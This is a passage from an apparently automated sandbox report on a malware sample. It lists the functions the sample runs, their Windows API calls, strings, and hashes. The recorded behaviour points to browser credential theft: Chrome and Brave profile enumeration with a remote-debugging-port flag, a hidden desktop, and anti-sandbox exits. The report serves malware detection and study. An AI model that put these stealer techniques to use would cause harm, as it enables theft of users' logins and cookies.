                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                              • String ID: ERROR$ERROR
                                              • API String ID: 3287882509-2579291623
                                              • Opcode ID: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
                                              • Instruction ID: 220a7b172e2a8d17d187597bbcd3bb12c7c2fc56be07e285a6b23909b802432f
                                              • Opcode Fuzzy Hash: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
                                              • Instruction Fuzzy Hash: 6E118630A01048ABCB14FF65EC52EED33399F50354F40456EF90A5B4A2EF38AB95C65E
                                              Function 00417A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocComputerNameProcess
                                              • String ID:
                                              • API String ID: 4203777966-0
                                              • Opcode ID: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                              • Instruction ID: 80df14e24d55d9e77394b8c0389cbc6422d62e125eda11eaf6ba37d1415b345b
                                              • Opcode Fuzzy Hash: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                              • Instruction Fuzzy Hash: D60181B1E08359ABC700CF98DD45BAFBBB8FB04751F10021BF505E2280E7B85A408BA2
                                              Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                              • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                              • ExitProcess.KERNEL32 ref: 00401143
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$AllocCurrentExitNumaVirtual
                                              • String ID:
                                              • API String ID: 1103761159-0
                                              • Opcode ID: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                              • Instruction ID: f86d798d442288df0e099431c712f1cdbed5da6d4770a056b1c254158006f616
                                              • Opcode Fuzzy Hash: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                              • Instruction Fuzzy Hash: DCE0E670D8A30CFBE7105BA19D0AB4D77689B04B15F101156F709BA5D0D6B92640565D
                                              Function 02C23DC6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C23DEE
                                              • Module32First.KERNEL32(00000000,00000224), ref: 02C23E0E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288500521.0000000002C23000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C23000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2c23000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0
                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction ID: 3758f397799b5761389e4b37dac7096442fbab5889f2e44d192b6c7fd8375606
                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction Fuzzy Hash: 85F09631200761AFD7203BF9988CB6F7AE8EF89625F1005A8F642D20C0DF78E94D4A61
                                              Function 04840E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000400,?,?,04840223,?,?), ref: 04840E19
                                              • SetErrorMode.KERNEL32(00000000,?,?,04840223,?,?), ref: 04840E1E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction ID: e7b55c28955cfabbbc7d8a91ac3f1643ee156a9a3ff42a2618d5e5b9483b11ef
                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction Fuzzy Hash: D1D0123154512C77D7002A94DC09BCE7B1CDF05B62F008411FB0DD9080C770964046E5
                                              Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416CBC), ref: 004010B3
                                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416CBC), ref: 004010F7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Virtual$AllocFree
                                              • String ID:
                                              • API String ID: 2087232378-0
                                              • Opcode ID: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
                                              • Instruction ID: a2dd58c0224e163af538114889642f36ecbeef109afe3d50a53e5cb7169f74e2
                                              • Opcode Fuzzy Hash: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
                                              • Instruction Fuzzy Hash: 74F0E2B1A42208BBE7149AA4AC59FAFB799E705B04F300459F540E3290D571AF00DAA4
                                              Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                              • ExitProcess.KERNEL32 ref: 004011C6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$Process$AllocName$ComputerExitUser
                                              • String ID:
                                              • API String ID: 1004333139-0
                                              • Opcode ID: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                              • Instruction ID: bcf4cddec8ba3652d3daa4bfa83a7295d39fc22ea0064294e7a9f420d8d9705c
                                              • Opcode Fuzzy Hash: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                              • Instruction Fuzzy Hash: E1E0ECB5D5820152DB1473B6AC06B5B339D5B1934EF04142FF90896252FE29F8404169
                                              Function 02C23A85 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02C23AD6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288500521.0000000002C23000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C23000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_2c23000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction ID: be13d35ecaceb7cd525d9bbc4d86dd1862b91681ccd7c84af3a078d11577c381
                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction Fuzzy Hash: 97112879A00208EFDB01DF98C985E98BBF5AF08751F0580A4F9489B361D775EA90EF90

                                              Non-executed Functions

                                              Function 0040BE40 Relevance: 63.7, APIs: 29, Strings: 7, Instructions: 727fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0040BEC5
                                              • StrCmpCA.SHLWAPI(?,00421454), ref: 0040BF33
                                              • StrCmpCA.SHLWAPI(?,00421458), ref: 0040BF49
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C8A9
                                              • FindClose.KERNEL32(000000FF), ref: 0040C8BB
                                              Strings
                                              • \Brave\Preferences, xrefs: 0040C1C1
                                              • Brave, xrefs: 0040C0E8
                                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C495
                                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C534
                                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0040C3B2
                                              • Google Chrome, xrefs: 0040C6F8
                                              • Preferences, xrefs: 0040C104
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                              • API String ID: 3334442632-1869280968
                                              • Opcode ID: 7f2c12acea1fb690b98b804b029ed6a0b383e69760eb48825d33dc6626a9561a
                                              • Instruction ID: 94c18d54b217f3a33de79012ae3cbc39d408ee074d55138b38aa149d1ce8c153
                                              • Opcode Fuzzy Hash: 7f2c12acea1fb690b98b804b029ed6a0b383e69760eb48825d33dc6626a9561a
                                              • Instruction Fuzzy Hash: 5C52A871A011049BCB14FB61DC96EEE733DAF54304F4045AEF50A66091EF386B98CFAA
                                              Function 00413B00 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • wsprintfA.USER32 ref: 00413B1C
                                              • FindFirstFileA.KERNEL32(?,?), ref: 00413B33
                                              • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                              • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                              • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                              • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$q?A
                                              • API String ID: 1125553467-4052298153
                                              • Opcode ID: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
                                              • Instruction ID: 118bc6de907018410b19fab89ebe74f6f374c1ff32bc5bb8bfd4c4c53b142975
                                              • Opcode Fuzzy Hash: 5188e768485120e5afde4a9c889630e7fccae7ad22d18829d963d7ba80f2afd1
                                              • Instruction Fuzzy Hash: E9A141B1A042189BDB24DF64DC85FEA7379BB48301F44458EF60D96181EB74AB88CF66
                                              Function 0484C0A7 Relevance: 44.2, APIs: 29, Instructions: 727fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0484C12C
                                              • StrCmpCA.SHLWAPI(?,00421454), ref: 0484C19A
                                              • StrCmpCA.SHLWAPI(?,00421458), ref: 0484C1B0
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0484CB10
                                              • FindClose.KERNEL32(000000FF), ref: 0484CB22
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 3334442632-0
                                              • Opcode ID: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
                                              • Instruction ID: 1f7bc9fad199007f085818ac58508675b6f5dddc326f759f139db5014e110d79
                                              • Opcode Fuzzy Hash: 7b98e80a942e0a63a7546d3dbe04fcd52efaade0bac1e590d268923d2021d0db
                                              • Instruction Fuzzy Hash: 275234719001189BDF58FB64DC95EEE7339AF54305F404BA9A90AE60A0EFB47B48CF52
                                              Function 00414B60 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 172fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • wsprintfA.USER32 ref: 00414B7C
                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                              • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
                                              • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
                                              • FindClose.KERNEL32(000000FF), ref: 00414DE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID: %s\%s$%s\%s$%s\*$-SA
                                              • API String ID: 180737720-309722913
                                              • Opcode ID: 10fc233258d7d774f39183cfdf7fbc98fbe50a34da23b857008ae2781d984a66
                                              • Instruction ID: 6eceda3e2f2aeeb228f448c6629b31eb3c314648a2220d8d34325ba683034fba
                                              • Opcode Fuzzy Hash: 10fc233258d7d774f39183cfdf7fbc98fbe50a34da23b857008ae2781d984a66
                                              • Instruction Fuzzy Hash: F2617771904218ABCB20EBA0ED45FEA737DBF48701F40458EF60996191FB74AB84CF95
                                              Function 04853D67 Relevance: 31.8, APIs: 21, Instructions: 250filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • wsprintfA.USER32 ref: 04853D83
                                              • FindFirstFileA.KERNEL32(?,?), ref: 04853D9A
                                              • lstrcat.KERNEL32(?,?), ref: 04853DEC
                                              • StrCmpCA.SHLWAPI(?,00420F58), ref: 04853DFE
                                              • StrCmpCA.SHLWAPI(?,00420F5C), ref: 04853E14
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0485411E
                                              • FindClose.KERNEL32(000000FF), ref: 04854133
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                              • String ID:
                                              • API String ID: 1125553467-0
                                              • Opcode ID: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
                                              • Instruction ID: 76c772b3ad164982ec75c25bfa961c0b7612580dfcd36bf9c240cb539d866e54
                                              • Opcode Fuzzy Hash: 3ab95b3bf23d215e0781e232aecc607664a3e5c33156cac28c621625d69ea7f5
                                              • Instruction Fuzzy Hash: A7A16371A0021C9BDB24EFA4DC84FEE7379BF54704F444A89AA0DD6190EB75AB84CF52
                                              Function 004147C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                              • HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                              • wsprintfA.USER32 ref: 004147F6
                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                              • StrCmpCA.SHLWAPI(?,00420FAC), ref: 0041483B
                                              • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414851
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004148DB
                                              • FindClose.KERNEL32(000000FF), ref: 004148F0
                                              • lstrcatA.KERNEL32(?,02C9ED50,?,00000104), ref: 00414915
                                              • lstrcatA.KERNEL32(?,02CA6130), ref: 00414928
                                              • lstrlenA.KERNEL32(?), ref: 00414935
                                              • lstrlenA.KERNEL32(?), ref: 00414946
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                              • String ID: %s\%s$%s\*
                                              • API String ID: 13328894-2848263008
                                              • Opcode ID: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
                                              • Instruction ID: 4add3c5e25650dce6a2d7e09fe25a02d5f48076a238705849ce39c3d90be09a7
                                              • Opcode Fuzzy Hash: 69dcb7b57205299e4e353f4ff5e3bd6fee26fba3a9fd294cee8ca8b6e7cecfcb
                                              • Instruction Fuzzy Hash: 145187B1944218ABCB20EB70DC89FEE737DAB58300F40459EB64996190EB74EBC4CF95
                                              Function 04854DC7 Relevance: 27.2, APIs: 18, Instructions: 172fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • wsprintfA.USER32 ref: 04854DE3
                                              • FindFirstFileA.KERNEL32(?,?), ref: 04854DFA
                                              • StrCmpCA.SHLWAPI(?,00420FC4), ref: 04854E28
                                              • StrCmpCA.SHLWAPI(?,00420FC8), ref: 04854E3E
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 04855034
                                              • FindClose.KERNEL32(000000FF), ref: 04855049
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID:
                                              • API String ID: 180737720-0
                                              • Opcode ID: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
                                              • Instruction ID: 1333aa46677de88df3ee80a24a39f59546f7b49b2ae5ccddabba177bfd363ac2
                                              • Opcode Fuzzy Hash: fcb2fc1512f1b2bfff4d459872b36b8889449b0cd5417e01b30465ecde3626f1
                                              • Instruction Fuzzy Hash: 17616671D00218ABDB24EBA4DD48FEA737DAF48705F404689BA09D6090FB75AB84CF91
                                              Function 00409E30 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 157stringsleepprocessCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 00409E47
                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02CA08F8,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • wsprintfA.USER32 ref: 00409E7F
                                              • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409EA3
                                              • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409ECC
                                              • memset.MSVCRT ref: 00409EED
                                              • lstrcatA.KERNEL32(00000000,?), ref: 00409F03
                                              • lstrcatA.KERNEL32(00000000,?), ref: 00409F17
                                              • lstrcatA.KERNEL32(00000000,004212D8), ref: 00409F29
                                              • memset.MSVCRT ref: 00409F3D
                                              • lstrcpy.KERNEL32(?,00000000), ref: 00409F7C
                                              • memset.MSVCRT ref: 00409F9C
                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0040A004
                                              • Sleep.KERNEL32(00001388), ref: 0040A013
                                              • CloseDesktop.USER32(00000000), ref: 0040A060
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
                                              • String ID: D
                                              • API String ID: 1347862506-2746444292
                                              • Opcode ID: a10202c694136cf4b08f8315fe38596f638a8bb39b3ba1580b4dfb3a89c0cba5
                                              • Instruction ID: 9351db1e319cd03a78e50f41365f33c4a7b54471eb3ec1f6bde0cae738676000
                                              • Opcode Fuzzy Hash: a10202c694136cf4b08f8315fe38596f638a8bb39b3ba1580b4dfb3a89c0cba5
                                              • Instruction Fuzzy Hash: B551B3B1D04318ABDB20DF60DC4AFDA7778AB48704F004599F60DAA2D1EB75AB84CF55
                                              Function 004140F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
